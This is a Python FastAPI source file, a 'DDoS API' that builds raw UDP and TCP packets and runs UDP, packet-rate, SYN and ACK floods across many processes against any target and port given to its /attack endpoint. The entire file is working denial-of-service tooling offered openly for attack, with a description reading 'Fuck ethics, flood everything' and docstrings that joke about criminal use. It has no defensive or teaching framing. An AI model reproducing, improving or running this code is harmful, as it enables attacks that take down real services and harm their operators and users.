from fastapi import FastAPI, BackgroundTasks from fastapi.responses import JSONResponse import socket import struct import random import os import asyncio from typing import Optional import multiprocessing app = FastAPI(title="Niansuh DDoS API", description="Fuck ethics, flood everything.") # Global vars (because why not?) target = "127.0.0.1" port = 80 threads = 100 stop_event = multiprocessing.Event() def checksum(data: bytes) -> int: """RFC 1071 checksum (because we need to pretend this is legit).""" sum = 0 for i in range(0, len(data), 2): if i + 1 < len(data): sum += (data[i] << 8) + data[i + 1] else: sum += data[i] << 8 sum = (sum >> 16) + (sum & 0xFFFF) sum += sum >> 16 return ~sum & 0xFFFF def pseudo_header(src_ip: str, dst_ip: str, proto: int, length: int) -> bytes: """Pseudo-header for TCP/UDP checksum (because raw sockets need love).""" src = socket.inet_aton(src_ip) dst = socket.inet_aton(dst_ip) return struct.pack( "!4s4sBBH", src, dst, 0, # Reserved proto, length, ) def build_udp_packet(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes: """Build a raw UDP packet (because UDP is fire-and-forget).""" # IP Header ip_header = struct.pack( "!BBHHHBBH4s4s", 0x45, # Version/IHL 0x00, # ToS 20 + 8 + len(payload), # Total Length random.randint(0, 65535), # ID 0x0000, # Flags/Frag Offset 64, # TTL 17, # Protocol (UDP) 0, # Checksum (filled later) socket.inet_aton(src_ip), socket.inet_aton(dst_ip), ) ip_checksum = checksum(ip_header) ip_header = ip_header[:10] + struct.pack("!H", ip_checksum) + ip_header[12:] # UDP Header udp_header = struct.pack( "!HHHH", src_port, dst_port, 8 + len(payload), # UDP Length 0, # Checksum (filled later) ) udp_checksum = checksum(pseudo_header(src_ip, dst_ip, 17, 8 + len(payload)) + udp_header + payload) udp_header = udp_header[:6] + struct.pack("!H", udp_checksum) + udp_header[8:] return ip_header + udp_header + payload def build_tcp_packet( src_ip: str, dst_ip: str, src_port: int, dst_port: int, seq: int, ack: int, flags: int, ) -> bytes: """Build a raw TCP packet (because SYN floods are fun).""" # IP Header ip_header = struct.pack( "!BBHHHBBH4s4s", 0x45, # Version/IHL 0x00, # ToS 20 + 20, # Total Length (IP + TCP) random.randint(0, 65535), # ID 0x0000, # Flags/Frag Offset 64, # TTL 6, # Protocol (TCP) 0, # Checksum (filled later) socket.inet_aton(src_ip), socket.inet_aton(dst_ip), ) ip_checksum = checksum(ip_header) ip_header = ip_header[:10] + struct.pack("!H", ip_checksum) + ip_header[12:] # TCP Header tcp_header = struct.pack( "!HHLLBBHHH", src_port, dst_port, seq, ack, (5 << 4), # Data Offset flags, 0xFFFF, # Window Size 0, # Checksum (filled later) 0, # Urgent Pointer ) tcp_checksum = checksum( pseudo_header(src_ip, dst_ip, 6, 20) + tcp_header ) tcp_header = tcp_header[:16] + struct.pack("!H", tcp_checksum) + tcp_header[18:] return ip_header + tcp_header def get_local_ip(dst_ip: str) -> str: """Get local IP for routing (because we need to spoof properly).""" try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((dst_ip, 53)) # DNS port (because why not) local_ip = s.getsockname()[0] s.close() return local_ip except: return "0.0.0.0" def udp_flood(dst_ip: str, dst_port: int): """UDP flood (because why not drown the target?).""" local_ip = get_local_ip(dst_ip) if local_ip == "0.0.0.0": return sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) payload = os.urandom(1200) # Random payload (because noise is good) while not stop_event.is_set(): src_port = random.randint(1024, 65535) packet = build_udp_packet(local_ip, dst_ip, src_port, dst_port, payload) sock.sendto(packet, (dst_ip, 0)) # Port 0 because raw socket def udp_pps_flood(dst_ip: str, dst_port: int): """UDP PPS flood (because packets per second matter).""" local_ip = get_local_ip(dst_ip) if local_ip == "0.0.0.0": return sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) while not stop_event.is_set(): src_port = random.randint(1024, 65535) packet = build_udp_packet(local_ip, dst_ip, src_port, dst_port, b"") sock.sendto(packet, (dst_ip, 0)) def syn_flood(dst_ip: str, dst_port: int): """SYN flood (because half-open connections are annoying).""" local_ip = get_local_ip(dst_ip) if local_ip == "0.0.0.0": return sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) while not stop_event.is_set(): src_port = random.randint(1024, 65535) seq = random.randint(0, 0xFFFFFFFF) packet = build_tcp_packet(local_ip, dst_ip, src_port, dst_port, seq, 0, 0x02) # SYN flag sock.sendto(packet, (dst_ip, 0)) def ack_flood(dst_ip: str, dst_port: int): """ACK flood (because why not confuse the target?).""" local_ip = get_local_ip(dst_ip) if local_ip == "0.0.0.0": return sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) while not stop_event.is_set(): src_port = random.randint(1024, 65535) seq = random.randint(0, 0xFFFFFFFF) ack = random.randint(0, 0xFFFFFFFF) packet = build_tcp_packet(local_ip, dst_ip, src_port, dst_port, seq, ack, 0x10) # ACK flag sock.sendto(packet, (dst_ip, 0)) def start_flood(flood_type: str, dst_ip: str, dst_port: int, num_threads: int): """Start the flood in background (because async is cool).""" stop_event.clear() processes = [] for _ in range(num_threads): if flood_type == "udp": p = multiprocessing.Process(target=udp_flood, args=(dst_ip, dst_port)) elif flood_type == "udp-pps": p = multiprocessing.Process(target=udp_pps_flood, args=(dst_ip, dst_port)) elif flood_type == "syn": p = multiprocessing.Process(target=syn_flood, args=(dst_ip, dst_port)) elif flood_type == "ack": p = multiprocessing.Process(target=ack_flood, args=(dst_ip, dst_port)) else: return p.start() processes.append(p) return processes @app.post("/attack") async def attack( background_tasks: BackgroundTasks, flood_type: str = "udp", target: str = "127.0.0.1", port: int = 80, threads: int = 100, ): """Endpoint to start the attack (because why not expose it to the world?).""" global stop_event processes = start_flood(flood_type, target, port, threads) def stop_attack(): stop_event.set() for p in processes: p.terminate() background_tasks.add_task(stop_attack) return JSONResponse( content={ "status": "attack started", "type": flood_type, "target": f"{target}:{port}", "threads": threads, } ) @app.post("/stop") async def stop(): """Endpoint to stop the attack (because even criminals need a kill switch).""" stop_event.set() return JSONResponse(content={"status": "attack stopped"})